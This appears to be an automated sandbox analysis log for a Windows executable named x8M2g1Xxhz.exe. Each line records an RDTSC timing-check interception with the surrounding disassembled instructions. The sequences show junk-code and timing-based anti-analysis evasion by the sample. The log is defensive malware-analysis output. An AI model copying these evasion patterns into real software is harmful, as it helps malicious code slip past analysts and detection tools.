Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 65F973 second address: 65F991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC2192E8594h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 662C2D second address: 662C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 66440A second address: 664425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC2192E8596h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 664425 second address: 664440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC218F099C4h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 664440 second address: 664449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 664449 second address: 66444D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6642A1 second address: 6642A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6642A9 second address: 6642AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 59F26C second address: 59F271 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6758AE second address: 6758C3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC218F099B6h 0x00000008 jnl 00007FC218F099B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6758C3 second address: 6758C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6758C9 second address: 6758CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6758CE second address: 6758D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6758D4 second address: 6758DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6758DA second address: 6758DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6758DE second address: 6758E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6758E4 second address: 6758F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6758F2 second address: 675914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FC218F099C9h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 675914 second address: 675945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E858Ch 0x00000007 jmp 00007FC2192E858Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC2192E8591h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 675945 second address: 675949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 675949 second address: 67594D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 67831A second address: 67833D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FC218F099B6h 0x00000009 jmp 00007FC218F099C8h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 67A922 second address: 67A93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2192E8594h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 67A93C second address: 67A94F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099BAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 67A94F second address: 67A96A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2192E8597h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 67C267 second address: 67C26D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 67C26D second address: 67C271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 67C271 second address: 67C294 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC218F099BAh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC218F099BCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 67C294 second address: 67C298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 67C298 second address: 67C29C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 67C29C second address: 67C2AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FC2192E8592h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 67C2AA second address: 67C2B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC218F099B6h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 67F37F second address: 67F393 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC2192E8586h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6832E9 second address: 6832EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6832EE second address: 683339 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pushad 0x00000007 je 00007FC2192E8586h 0x0000000d jnl 00007FC2192E8586h 0x00000013 jne 00007FC2192E8586h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jl 00007FC2192E8586h 0x00000025 js 00007FC2192E8586h 0x0000002b jne 00007FC2192E8586h 0x00000031 popad 0x00000032 jmp 00007FC2192E8599h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 683339 second address: 683341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 682E88 second address: 682E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 682E8E second address: 682E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 682E97 second address: 682E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 682E9D second address: 682EA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 69C850 second address: 69C874 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC2192E8588h 0x00000008 jns 00007FC2192E858Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 jnp 00007FC2192E8586h 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 69E35E second address: 69E381 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC218F099C1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 69E381 second address: 69E39B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC2192E8586h 0x00000008 jc 00007FC2192E8586h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6A4457 second address: 6A445C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6A4609 second address: 6A460F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6A460F second address: 6A4619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6A4619 second address: 6A461D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6A461D second address: 6A463D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC218F099C7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6A4D6C second address: 6A4D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6A4ECA second address: 6A4EE3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC218F099B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d jno 00007FC218F099B6h 0x00000013 pop ebx 0x00000014 push ebx 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6A52C6 second address: 6A52D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FC2192E8586h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6A52D2 second address: 6A52E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC218F099C2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6A52E8 second address: 6A52EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6A52EC second address: 6A52F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6A85BB second address: 6A85EA instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC2192E8586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007FC2192E858Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jc 00007FC2192E8590h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6A85EA second address: 6A85F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6A8867 second address: 6A886C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6A886C second address: 6A88E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edx, ecx 0x0000000a push dword ptr [ebp+136332D1h] 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FC218F099B8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a call 00007FC218F099B9h 0x0000002f pushad 0x00000030 push eax 0x00000031 pushad 0x00000032 popad 0x00000033 pop eax 0x00000034 jno 00007FC218F099C4h 0x0000003a popad 0x0000003b push eax 0x0000003c jmp 00007FC218F099C4h 0x00000041 mov eax, dword ptr [esp+04h] 0x00000045 push eax 0x00000046 push edx 0x00000047 js 00007FC218F099BCh 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6A88E1 second address: 6A88E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6A88E5 second address: 6A88F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC218F099C0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6A88F9 second address: 6A8911 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC2192E8586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e je 00007FC2192E85A0h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6A8911 second address: 6A8915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6A8915 second address: 6A8930 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E858Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6A8930 second address: 6A894C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5AC9E1 second address: 5AC9E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5AC9E6 second address: 5AC9EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B1B4B second address: 46B1B51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B1B51 second address: 46B1B55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B1B55 second address: 46B1BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC2192E8598h 0x0000000e xchg eax, ecx 0x0000000f jmp 00007FC2192E8590h 0x00000014 call dword ptr [76FF188Ch] 0x0000001a mov edi, edi 0x0000001c push ebp 0x0000001d mov ebp, esp 0x0000001f push ecx 0x00000020 mov ecx, dword ptr [7FFE0004h] 0x00000026 mov dword ptr [ebp-04h], ecx 0x00000029 cmp ecx, 01000000h 0x0000002f jc 00007FC21931A065h 0x00000035 mov eax, 7FFE0320h 0x0000003a mov eax, dword ptr [eax] 0x0000003c mul ecx 0x0000003e shrd eax, edx, 00000018h 0x00000042 mov esp, ebp 0x00000044 pop ebp 0x00000045 ret 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FC2192E8597h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B1BA6 second address: 46B1A30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 16CD78EAh 0x00000008 pushfd 0x00000009 jmp 00007FC218F099BBh 0x0000000e add al, FFFFFF8Eh 0x00000011 jmp 00007FC218F099C9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ecx 0x0000001b jmp 00007FC218F099BEh 0x00000020 ret 0x00000021 nop 0x00000022 xor esi, eax 0x00000024 lea eax, dword ptr [ebp-10h] 0x00000027 push eax 0x00000028 call 00007FC21D1A8965h 0x0000002d mov edi, edi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B1A30 second address: 46B1A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B1A37 second address: 46B1A4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC218F099C1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B1A4C second address: 46B1A6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8591h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ch, bh 0x00000011 mov esi, 738CFEEBh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B1A6F second address: 46B1A8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bl, 64h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC218F099C2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B1A8E second address: 46B1AAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E858Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FC2192E858Bh 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B1AAF second address: 46B1B0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007FC218F099C4h 0x00000011 push esi 0x00000012 pop edx 0x00000013 pop ecx 0x00000014 mov cx, di 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FC218F099C2h 0x00000022 jmp 00007FC218F099C5h 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B1B0F second address: 46B1B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B1B14 second address: 46B1B1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B1B1A second address: 46B1B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 4680191 second address: 4680195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 4680195 second address: 46801B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8598h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46801B1 second address: 46801B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46801B7 second address: 46801BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46801BB second address: 46801F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC218F099BCh 0x00000013 adc eax, 03A8C868h 0x00000019 jmp 00007FC218F099BBh 0x0000001e popfd 0x0000001f mov ebx, esi 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 mov ebx, esi 0x00000029 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 4690A22 second address: 4690A53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC2192E858Ch 0x00000008 pop ecx 0x00000009 mov dh, 6Ch 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FC2192E858Ah 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC2192E858Eh 0x0000001c rdtsc
